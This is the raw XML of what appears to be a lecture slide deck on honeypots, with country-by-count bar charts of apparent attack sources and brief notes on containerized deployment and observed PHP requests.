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1"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId32"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="260" r:id="rId3"/>
    <p:sldId id="283" r:id="rId4"/>
    <p:sldId id="273" r:id="rId5"/>
    <p:sldId id="258" r:id="rId6"/>
    <p:sldId id="259" r:id="rId7"/>
    <p:sldId id="257" r:id="rId8"/>
    <p:sldId id="287" r:id="rId9"/>
    <p:sldId id="288" r:id="rId10"/>
    <p:sldId id="289" r:id="rId11"/>
    <p:sldId id="261" r:id="rId12"/>
    <p:sldId id="262" r:id="rId13"/>
    <p:sldId id="263" r:id="rId14"/>
    <p:sldId id="290" r:id="rId15"/>
    <p:sldId id="266" r:id="rId16"/>
    <p:sldId id="264" r:id="rId17"/>
    <p:sldId id="265" r:id="rId18"/>
    <p:sldId id="267" r:id="rId19"/>
    <p:sldId id="268" r:id="rId20"/>
    <p:sldId id="271" r:id="rId21"/>
    <p:sldId id="285" r:id="rId22"/>
    <p:sldId id="286" r:id="rId23"/>
    <p:sldId id="276" r:id="rId24"/>
    <p:sldId id="277" r:id="rId25"/>
    <p:sldId id="278" r:id="rId26"/>
    <p:sldId id="280" r:id="rId27"/>
    <p:sldId id="275" r:id="rId28"/>
    <p:sldId id="284" r:id="rId29"/>
    <p:sldId id="281" r:id="rId30"/>
    <p:sldId id="282" r:id="rId3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88"/>
    <p:restoredTop sz="93610"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="131" d="100"/>
          <a:sy n="131" d="100"/>
        </p:scale>
        <p:origin x="184" y="552"/>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4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Country</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E6BB-3E4F-BD55-AEEE0CE7DBC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E6BB-3E4F-BD55-AEEE0CE7DBC5}"/>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4-E6BB-3E4F-BD55-AEEE0CE7DBC5}"/>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E6BB-3E4F-BD55-AEEE0CE7DBC5}"/>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6-E6BB-3E4F-BD55-AEEE0CE7DBC5}"/>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E6BB-3E4F-BD55-AEEE0CE7DBC5}"/>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8-E6BB-3E4F-BD55-AEEE0CE7DBC5}"/>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E6BB-3E4F-BD55-AEEE0CE7DBC5}"/>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A-E6BB-3E4F-BD55-AEEE0CE7DBC5}"/>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E6BB-3E4F-BD55-AEEE0CE7DBC5}"/>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01-E6BB-3E4F-BD55-AEEE0CE7DBC5}"/>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03-E6BB-3E4F-BD55-AEEE0CE7DBC5}"/>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04-E6BB-3E4F-BD55-AEEE0CE7DBC5}"/>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05-E6BB-3E4F-BD55-AEEE0CE7DBC5}"/>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06-E6BB-3E4F-BD55-AEEE0CE7DBC5}"/>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07-E6BB-3E4F-BD55-AEEE0CE7DBC5}"/>
                </c:ext>
              </c:extLst>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08-E6BB-3E4F-BD55-AEEE0CE7DBC5}"/>
                </c:ext>
              </c:extLst>
            </c:dLbl>
            <c:dLbl>
              <c:idx val="7"/>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09-E6BB-3E4F-BD55-AEEE0CE7DBC5}"/>
                </c:ext>
              </c:extLst>
            </c:dLbl>
            <c:dLbl>
              <c:idx val="8"/>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60000"/>
                        </a:schemeClr>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0A-E6BB-3E4F-BD55-AEEE0CE7DBC5}"/>
                </c:ext>
              </c:extLst>
            </c:dLbl>
            <c:dLbl>
              <c:idx val="9"/>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lumMod val="60000"/>
                        </a:schemeClr>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0B-E6BB-3E4F-BD55-AEEE0CE7DBC5}"/>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10"/>
                <c:pt idx="0">
                  <c:v>United States</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>China</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>Egypt</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>Vietnam</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>Russia</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>Republic of Korea</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>Taiwan</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>India</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>Brazil</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>Japan</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Sheet1!$B$2:$B$11</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="10"/>
                <c:pt idx="0">
                  <c:v>24949</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>24868</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>7875</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>4224</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>3777</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>3399</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>2709</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>2526</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>2448</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>2402</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000000-E6BB-3E4F-BD55-AEEE0CE7DBC5}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:dLbls>
          <c:dLblPos val="outEnd"/>
          <c:showLegendKey val="0"/>
          <c:showVal val="1"/>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4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Countries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D7B0-3F43-BC1C-95A0167129CC}"/>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D7B0-3F43-BC1C-95A0167129CC}"/>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D7B0-3F43-BC1C-95A0167129CC}"/>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4-D7B0-3F43-BC1C-95A0167129CC}"/>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D7B0-3F43-BC1C-95A0167129CC}"/>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6-D7B0-3F43-BC1C-95A0167129CC}"/>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D7B0-3F43-BC1C-95A0167129CC}"/>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8-D7B0-3F43-BC1C-95A0167129CC}"/>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D7B0-3F43-BC1C-95A0167129CC}"/>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A-D7B0-3F43-BC1C-95A0167129CC}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="10"/>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D7B0-3F43-BC1C-95A0167129CC}"/>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D7B0-3F43-BC1C-95A0167129CC}"/>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D7B0-3F43-BC1C-95A0167129CC}"/>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D7B0-3F43-BC1C-95A0167129CC}"/>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4-D7B0-3F43-BC1C-95A0167129CC}"/>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D7B0-3F43-BC1C-95A0167129CC}"/>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6-D7B0-3F43-BC1C-95A0167129CC}"/>
                </c:ext>
              </c:extLst>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D7B0-3F43-BC1C-95A0167129CC}"/>
                </c:ext>
              </c:extLst>
            </c:dLbl>
            <c:dLbl>
              <c:idx val="7"/>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8-D7B0-3F43-BC1C-95A0167129CC}"/>
                </c:ext>
              </c:extLst>
            </c:dLbl>
            <c:dLbl>
              <c:idx val="8"/>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D7B0-3F43-BC1C-95A0167129CC}"/>
                </c:ext>
              </c:extLst>
            </c:dLbl>
            <c:dLbl>
              <c:idx val="9"/>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A-D7B0-3F43-BC1C-95A0167129CC}"/>
                </c:ext>
              </c:extLst>
            </c:dLbl>
            <c:dLbl>
              <c:idx val="1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B-D7B0-3F43-BC1C-95A0167129CC}"/>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0"/>
                <c:pt idx="0">
                  <c:v>China</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Egypt</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>United States</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>Brazil</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>Russia</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>Iran</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>Greece</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>Republic of Korea</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>India</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>Taiwan</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Sheet1!$B$2:$B$12</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="11"/>
                <c:pt idx="0">
                  <c:v>1117</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>927</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>840</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>819</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>598</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>290</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>264</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>259</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>251</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>247</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000000-D7B0-3F43-BC1C-95A0167129CC}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:dLbls>
          <c:dLblPos val="outEnd"/>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="1"/>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505D7-AC7A-8340-BDDD-540667699D36}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/19/20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3810CF-3ED9-684D-ADFC-BF6479884155}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2490361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people-equation.com/killing-flies-with-honey-how-to-turn-a-frustrating-colleague-into-an-asset/honey-jar/"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creativecommons.org/licenses/by-nc-nd/3.0/"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honey pots</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>en.wikipedia.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/wiki/Honeypot_(computing)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5F3810CF-3ED9-684D-ADFC-BF6479884155}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4215856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90 days</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5F3810CF-3ED9-684D-ADFC-BF6479884155}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3072354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3810CF-3ED9-684D-ADFC-BF6479884155}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1249306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tooltip="http://people-equation.com/killing-flies-with-honey-how-to-turn-a-frustrating-colleague-into-an-asset/honey-jar/"/>
              </a:rPr>
              <a:t>This Photo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> by Unknown Author is licensed under </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:hlinkClick r:id="rId4" tooltip="https://creativecommons.org/licenses/by-nc-nd/3.0/"/>
              </a:rPr>
              <a:t>CC BY-NC-ND</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Honey pot not advertised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Should run same as production</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5F3810CF-3ED9-684D-ADFC-BF6479884155}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2065555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containerization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>From </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>docker.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5F3810CF-3ED9-684D-ADFC-BF6479884155}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3537924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t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>docker.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5F3810CF-3ED9-684D-ADFC-BF6479884155}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="52883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3810CF-3ED9-684D-ADFC-BF6479884155}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1641366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3810CF-3ED9-684D-ADFC-BF6479884155}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2522513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3810CF-3ED9-684D-ADFC-BF6479884155}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1945218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83% were php requests</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5F3810CF-3ED9-684D-ADFC-BF6479884155}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3999851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3810CF-3ED9-684D-ADFC-BF6479884155}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1105491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6E215B-1766-5A42-B585-EB58B32627F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5334"/>
            <a:ext cx="9144000" cy="5132832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="794203"/>
            <a:ext cx="7772400" cy="1102519"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1710889" y="2237707"/>
            <a:ext cx="5707109" cy="757171"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>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subtitle</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6D77AC9-6B80-2E4C-98C1-F5EAA624498A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1806552" y="3750449"/>
            <a:ext cx="5611446" cy="1393051"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21761884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7/21/19</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>© Steve Beaty and others</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0FCF0B8E-C764-B441-826F-3009896208B1}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11369478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ln w="25400">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="228600">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000" b="0" i="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>7/21/19</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>© Steve Beaty and others</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0FCF0B8E-C764-B441-826F-3009896208B1}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1566541907"/>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Two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01865"/>
            <a:ext cx="3991200" cy="3394472"/>
          </a:xfrm>
          <a:ln w="25400" cap="flat">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="228600">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000" b="0" i="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>7/21/19</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>© Steve Beaty and others</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
